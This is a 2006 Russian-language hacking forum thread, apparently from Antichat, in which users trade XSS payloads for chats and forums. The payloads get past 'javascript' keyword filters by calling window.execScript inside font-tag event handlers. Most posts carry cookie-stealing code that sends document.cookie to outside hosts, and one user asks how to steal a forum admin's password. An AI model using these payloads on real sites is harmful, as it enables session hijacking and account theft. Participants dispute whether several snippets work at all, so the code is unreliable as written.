Авторские статьи Проводим XSS без javascript

Discussion in 'Статьи' started by Xex, 4 Feb 2006.

  1. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    Эту писанину трудно назвать статьей, она скоре является дополнением к написанному Algol'ом по XSS.
    Думаю многим из вас приходилось встречать чаты/форумы/др. в которых присутвует уязвимость XSS, но провести ее сложно, по причине фильтрации магических слов javascript и vbscript, и модификации типа JaVasCriPt, javascript(с пробелами или табуляцией в начале),&#xx... и прочее не помогает. Так вот убедившись, что слово javascript наглухо фильтруется, есть возможность попробовать альтернативу execScript(это метод объекта window). Как написано в документации execScript - "Выполняет заданный сценарий".

    Рассмотрим на простом примере:

    Классический случай:
    Code:
    <font color=red onmouseover=javascript:alert()>алерт работает!</font>
    Используем execScript:
    Code:
    <font color=red onmouseover=window.execScript(alert())>И тут работает!</font>
    Эффект тот же=))

    Но, видимо, популярность такого метода не такая высокая как у классического по причине есго кривости...изначально в документации синтаксис execScript выглядит так:window.execScript(выражение [,язык]), но в последних версиях IE execScript не поймет даже такую строку execScript("a=1;alert(a)"). Выяснено, что он категорически не любит пробелы кавычки и ряд других необходимых символов(например для угона кукисов).
    Попробуйте:
    Code:
    <font color=red onmouseover=window.execScript(q="http://antichat.org/s/xex.gif?"+document.cookie)>не работает!</font>
    Для решения первой проблемы(невозможность использовать несколько команд одновременно(execScript(a=1;alert(a))) мы используем следующую особенность:
    Code:
    <font color=red onmouseover=window.execScript(alert());window.execScript(alert())>Два алерта!</font>
    т.е. через ; можем использовать несколько подряд идущих методов, что уже неплохо.
    А для решения второй проблемы(его нелюбовь к кавычкам и прочим символам) используем такую замечательную вещь как функции, типа alert, eval, isNaN и возможно прочие. Из этих трех мне приглянулась isNaN. Назначение этих функций для нас не важно, вся фича в том, что эти функции неким магическим способом(кому надо сам разберется) позволяют нам творить невозможное=)
    Смотрим:
    Code:
    <font color=red onmouseover=window.execScript(isNaN(q="http://antichat.org/s/we.gif?"+document.cookie));window.execScript(alert(q))>Получилось!</font> 
    Т.е. мы решили вторую проблему, таким образом мы создаем полноценную "куки-тырилку", несмотря на паранойю разработчика=))
    P.S.Возможно это уже где-то описывалось, не встречал.
    P.S.S.За всеми вопросами пишем сюда...
     
    Jer1cho, Lexik, Майор and 5 others like this.
  2. lexa

    lexa Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    75
    Likes Received:
    11
    Reputations:
    -2
    прикольно ! тоже самое можно сделать и на vbs


    cool
     
    #2 lexa, 4 Feb 2006
    Last edited: 4 Feb 2006
  3. A110ut

    A110ut Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    505
    Likes Received:
    263
    Reputations:
    92
    гыг.. ша испытаем в полевых условиях...
    --------------------------------------
    не уверен, но кажися я подоное где-то уже видел :D
     
    #3 A110ut, 4 Feb 2006
    Last edited: 4 Feb 2006
  4. K[o]S

    K[o]S Member

    Joined:
    29 Jul 2005
    Messages:
    17
    Likes Received:
    5
    Reputations:
    4
    А нах этот гемор.
    <font color=red onmouseover=javascript:alert()>алерт работает!</font>
    Можно просто
    <font color=red onmouseover=alert()>алерт работает!</font>
    потому что события и так обрабтываются javascript`oм.
     
    1 person likes this.
  5. Victor

    Victor Banned

    Joined:
    4 Feb 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Автор спасибо тебе большое! Я давно так не смеялся!

    Во-первых код который ты дал для воровки кук работать не будет, будет только алерт твоего скрипта воровки кук лол.

    Дальше, научись писать ок? тогда все у тебя будет работать.

    Алерт во всех браузерах.

    HTML:
    <font color=red onmouseover=window.execScript("a=1;alert(a)")>И тут работает!</font>
    Воровка кук во всех браузерах.


    HTML:
    <font color=red onmouseover=window.execScript("img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")>Получилось!</font>
    А так уже все? "Прикрыли" да?

    HTML:
    <font color=red onmouseover=a=1;alert(a)>И тут работает!</font>

    HTML:
    <font color=red onmouseover=img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>Получилось!</font>

    Или ты просто написал для выкрутасывания?

    Ну можно тогда повыкрутасыватся и вот так воть,

    HTML:
    <font color=red onmouseover=img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;eval(img);>Получилось!</font>

    Во-общем пиши побольше статей, в разделе юмор качественных таких вот статейяк которые являются статейками продолжениями статей Алгола - мало.
     
    #5 Victor, 4 Feb 2006
    Last edited: 4 Feb 2006
  6. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    To Victor: ошибаешься, все что ты написал, должен знать любой...я считаю это базисом и не посчитал нужным расписывать...
    P.S>процитируцй над чем ты смеялся...
     
  7. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    Это условности...повторюсь, кому надо тот код сам допишет, здесь только идея...
     
  8. Victor

    Victor Banned

    Joined:
    4 Feb 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Над тем как ты пишешь свои коды которые не работают лол.

    HTML:
    <font color=red onmouseover=window.execScript(isNaN(q="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie));window.execScript(alert(q))>Получилось!</font>
    Вот так допустим все что будет работать, так это алерт который будет орать

    И не болие.




    Тут Я упал.




    Имхо ну что ты мелешь....JavaScript это вообще протокол, execScript это метод переходить c одного языка на другой.


    Да не он не любит, а ты не правильно пишешь.


    HTML:
    <font color=red onmouseover=window.execScript(q="http://antichat.org/s/xex.gif?"+document.cookie)>не работает!</font>

    И почему это должно работать? О_О


    Мда, короче мда, дальше цитировать думаю не стоит.
     
  9. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    Все тама работает, руки проверь...

    Рад за тебя, что ты алерт, от всегоотсального отличаешь....

    И что мне мешает использовать его нестандартно?

    Бред...Желание до*б*атся...

    To Victor:если хочется похамится пиши в пм, не засоряем...
     
    #9 Xex, 4 Feb 2006
    Last edited: 4 Feb 2006
  10. Victor

    Victor Banned

    Joined:
    4 Feb 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Мда.....у тебя код воровки кук не может работать и не работает. Проверь для начала. Во-первых по какому принципу он будет у тебя работать? Ты у кого статью спер признавайся нука быстро....


    Мда, все что Я говорил ты просто забыл и тему сменил.

    У тебя алерт есть, но кук воровки быть не может в твоем коде.

    Как понять нестандартно? о_О

    Ответ,

    Слова выбирай и кончай курить.

    Вот Я тоже подумал когда статью твою прочел. Еще на меня смех напал.



    Короче не смеши гусей, Я написал тебе готовые коды как правильно писать надо, что ты сейчас хочешь выяснить Я не понимаю.....

    Статья = бред.

    Код воровки кук у тебя не работает и не может работать.

    Это Я сую в свою подпись.
     
    #10 Victor, 4 Feb 2006
    Last edited: 4 Feb 2006
  11. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    Специально для неугомонного Victor:
    Вот код ворования кукисов:
    Code:
    <font color=red onmouseover=window.execScript(isNaN(q="http://antichat.org/s/xex.gif?"+document.cookie));window.execScript(isNaN(document.images[0].src=q))>Welcome!</font> 
    я думаю ты не будешь докапыватся до images[0], ибо где ты эту атаку проводить будешь, наверняка есть рисунки, ЕСЛИ НЕТ, то можно и множеством других способов сделать то же самое...
     
  12. ViK_WS

    ViK_WS New Member

    Joined:
    29 Jan 2006
    Messages:
    43
    Likes Received:
    0
    Reputations:
    -5
    А как мона на YaBB форуме пороль админа стибзить???
     
  13. F_taker

    F_taker New Member

    Joined:
    18 Jan 2006
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    А с каких это пор Javascript стал протоколом?
     
  14. Victor

    Victor Banned

    Joined:
    4 Feb 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    лол....
     
  15. Victor

    Victor Banned

    Joined:
    4 Feb 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Xex, Я тебе уже давал рабочие примеры ты не правильно коды пишешь. :)
     
  16. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    млин какой ты непонятливый...на что мне твои примеры рабочие...проверь...лично у меня все работает...а таких рабочих примеров я сам знаю как строить...
     
  17. back0rifice

    back0rifice Active Member

    Joined:
    16 Mar 2006
    Messages:
    328
    Likes Received:
    107
    Reputations:
    19
    Угу, а "Turbo Assembler" - это беспроводная подводная лодка с вертикальным взлётом... Япацтулом :D ...
    Для справки: Java Script является интерпретируемым языком программирования, который используется для описания различных сценариев поведения браузера.
    Знаешь, Victor, может topicstarter что-то и написал неверно, но, по крайней мере, было, над чем призадуматься. Чего-то не нравится? Так объясни человеку нормально и вдумчиво, где именно он не прав, без всяких LOL'ов и выпендрёжа. Автор - X7R!
     
  18. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    Уже лето 2006 заканчивается=)))
    Имхо он не может так обяснить потому что Victor это WJ
     
  19. back0rifice

    back0rifice Active Member

    Joined:
    16 Mar 2006
    Messages:
    328
    Likes Received:
    107
    Reputations:
    19
    OFFTOP

    Понял, пошёл :) ...
    Да, я в курсе ;) ...
     
  20. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    302
    Likes Received:
    228
    Reputations:
    401
    Firefox и Opera не отреагировали даже на алерт, ну а если уж IE высветил "ограничение отображения активного содержимого", то эта замена не пойдет.
     
    #20 Go0o$E, 25 Aug 2006
    Last edited: 25 Aug 2006
Loading...
Similar Threads - Проводим javascript
  1. |qbz|
    Replies:
    3
    Views:
    6,438
  2. Kastor
    Replies:
    0
    Views:
    4,639
  3. m0s]{
    Replies:
    0
    Views:
    9,298
  4. vvs777
    Replies:
    3
    Views:
    5,010